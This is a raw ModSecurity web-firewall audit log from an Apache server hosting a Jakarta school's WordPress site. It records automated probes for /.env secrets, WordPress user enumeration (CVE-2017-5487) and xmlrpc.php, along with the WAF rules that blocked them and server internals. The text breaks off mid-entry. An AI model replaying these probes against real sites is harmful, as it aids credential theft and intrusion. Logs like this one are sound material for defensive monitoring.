proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746712952020797 5154 (- - -) Stopwatch2: 1746712952020797 5154; combined=3987, p1=468, p2=3300, p3=29, p4=31, p5=93, sr=69, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa44b977-Z-- --b9515c53-A-- [08/May/2025:21:06:03 +0700] aBy6S8P9GxxPAbCroFYsvgAAAE8 103.236.140.4 49560 103.236.140.4 8181 --b9515c53-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 159.89.127.165 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 159.89.127.165 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --b9515c53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9515c53-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746713163596611 774 (- - -) Stopwatch2: 1746713163596611 774; combined=307, p1=269, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9515c53-Z-- --11feb02c-A-- [08/May/2025:21:08:06 +0700] aBy6xsP9GxxPAbCroFYsyAAAAFQ 103.236.140.4 49600 103.236.140.4 8181 --11feb02c-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 138.197.191.87 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 138.197.191.87 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --11feb02c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11feb02c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746713286621617 791 (- - -) Stopwatch2: 1746713286621617 791; combined=309, p1=275, p2=0, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11feb02c-Z-- --0b64100a-A-- [08/May/2025:21:08:56 +0700] aBy6-I4K347NtBcwXKxhFAAAAIc 103.236.140.4 49614 103.236.140.4 8181 --0b64100a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 77.95.193.130 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 77.95.193.130 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0b64100a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b64100a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746713336962267 2827 (- - -) Stopwatch2: 1746713336962267 2827; combined=1224, p1=431, p2=764, p3=0, p4=0, p5=29, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b64100a-Z-- --7d2f3b11-A-- [08/May/2025:21:13:23 +0700] aBy8A6cs1DvJ_HgMHE9hMAAAABM 103.236.140.4 50542 103.236.140.4 8181 --7d2f3b11-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7d2f3b11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d2f3b11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746713603325618 3086 (- - -) Stopwatch2: 1746713603325618 3086; combined=1316, p1=461, p2=812, p3=0, p4=0, p5=43, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d2f3b11-Z-- --4d738301-A-- [08/May/2025:21:13:28 +0700] aBy8CKcs1DvJ_HgMHE9hMgAAAAA 103.236.140.4 50550 103.236.140.4 8181 --4d738301-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.211 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4d738301-C-- demo.sayHello --4d738301-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d738301-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746713608858694 5153 (- - -) Stopwatch2: 1746713608858694 5153; combined=3925, p1=467, p2=3248, p3=22, p4=26, p5=95, sr=66, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d738301-Z-- --cbdbba17-A-- [08/May/2025:21:22:28 +0700] aBy-JI4K347NtBcwXKxhHwAAAIg 103.236.140.4 50594 103.236.140.4 8181 --cbdbba17-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cbdbba17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbdbba17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746714148816558 3570 (- - -) Stopwatch2: 1746714148816558 3570; combined=1537, p1=475, p2=1030, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbdbba17-Z-- --7ce57063-A-- [08/May/2025:21:22:32 +0700] aBy-KMP9GxxPAbCroFYtHgAAAEw 103.236.140.4 50598 103.236.140.4 8181 --7ce57063-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.13 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7ce57063-C-- demo.sayHello --7ce57063-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ce57063-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746714152257389 5814 (- - -) Stopwatch2: 1746714152257389 5814; combined=4333, p1=525, p2=3581, p3=31, p4=32, p5=98, sr=72, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ce57063-Z-- --73fd0054-A-- [08/May/2025:21:22:59 +0700] aBy-Qys5rYyn3jlLjjIWVgAAANM 103.236.140.4 50606 103.236.140.4 8181 --73fd0054-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.216 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --73fd0054-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73fd0054-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746714179871569 2689 (- - -) Stopwatch2: 1746714179871569 2689; combined=1282, p1=435, p2=816, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73fd0054-Z-- --685e3128-A-- [08/May/2025:21:23:02 +0700] aBy-RsP9GxxPAbCroFYtIAAAAEk 103.236.140.4 50610 103.236.140.4 8181 --685e3128-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.216 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.216 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --685e3128-C-- demo.sayHello --685e3128-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --685e3128-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746714182898692 5751 (- - -) Stopwatch2: 1746714182898692 5751; combined=4177, p1=559, p2=3394, p3=34, p4=35, p5=92, sr=71, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --685e3128-Z-- --cd796c08-A-- [08/May/2025:21:30:48 +0700] aBzAGI4K347NtBcwXKxhIwAAAIk 103.236.140.4 50646 103.236.140.4 8181 --cd796c08-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cd796c08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd796c08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746714648189241 3027 (- - -) Stopwatch2: 1746714648189241 3027; combined=1411, p1=459, p2=920, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd796c08-Z-- --79f6e65f-A-- [08/May/2025:21:30:52 +0700] aBzAHI4K347NtBcwXKxhJAAAAJE 103.236.140.4 50650 103.236.140.4 8181 --79f6e65f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.58 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --79f6e65f-C-- demo.sayHello --79f6e65f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --79f6e65f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746714652562775 6123 (- - -) Stopwatch2: 1746714652562775 6123; combined=4435, p1=609, p2=3567, p3=46, p4=33, p5=104, sr=74, sw=76, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79f6e65f-Z-- --7ae32e41-A-- [08/May/2025:21:34:48 +0700] aBzBCMP9GxxPAbCroFYtIQAAAFI 103.236.140.4 50674 103.236.140.4 8181 --7ae32e41-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7ae32e41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ae32e41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746714888887631 2952 (- - -) Stopwatch2: 1746714888887631 2952; combined=1354, p1=445, p2=878, p3=0, p4=0, p5=31, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ae32e41-Z-- --8b56b047-A-- [08/May/2025:21:34:52 +0700] aBzBDCs5rYyn3jlLjjIWZwAAAMY 103.236.140.4 50678 103.236.140.4 8181 --8b56b047-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.44 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8b56b047-C-- demo.sayHello --8b56b047-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b56b047-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746714892509115 4971 (- - -) Stopwatch2: 1746714892509115 4971; combined=3778, p1=498, p2=3075, p3=23, p4=24, p5=92, sr=117, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b56b047-Z-- --35194665-A-- [08/May/2025:21:34:54 +0700] aBzBDis5rYyn3jlLjjIWaQAAAMg 103.236.140.4 50682 103.236.140.4 8181 --35194665-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --35194665-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35194665-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746714894832780 2129 (- - -) Stopwatch2: 1746714894832780 2129; combined=1054, p1=332, p2=693, p3=0, p4=0, p5=29, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35194665-Z-- --959b931d-A-- [08/May/2025:21:34:58 +0700] aBzBEis5rYyn3jlLjjIWawAAANg 103.236.140.4 50686 103.236.140.4 8181 --959b931d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.159 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --959b931d-C-- demo.sayHello --959b931d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --959b931d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746714898315958 4943 (- - -) Stopwatch2: 1746714898315958 4943; combined=3777, p1=453, p2=3108, p3=21, p4=24, p5=98, sr=65, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --959b931d-Z-- --c6ac9531-A-- [08/May/2025:21:35:17 +0700] aBzBJY4K347NtBcwXKxhJQAAAJI 103.236.140.4 50692 103.236.140.4 8181 --c6ac9531-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c6ac9531-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6ac9531-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746714917771724 2438 (- - -) Stopwatch2: 1746714917771724 2438; combined=1159, p1=372, p2=754, p3=0, p4=0, p5=33, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6ac9531-Z-- --23e11473-A-- [08/May/2025:21:35:21 +0700] aBzBKcP9GxxPAbCroFYtIgAAAE4 103.236.140.4 50696 103.236.140.4 8181 --23e11473-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.87 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --23e11473-C-- demo.sayHello --23e11473-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --23e11473-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746714921158686 4836 (- - -) Stopwatch2: 1746714921158686 4836; combined=3783, p1=443, p2=3118, p3=25, p4=29, p5=97, sr=67, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23e11473-Z-- --f775171e-A-- [08/May/2025:21:35:23 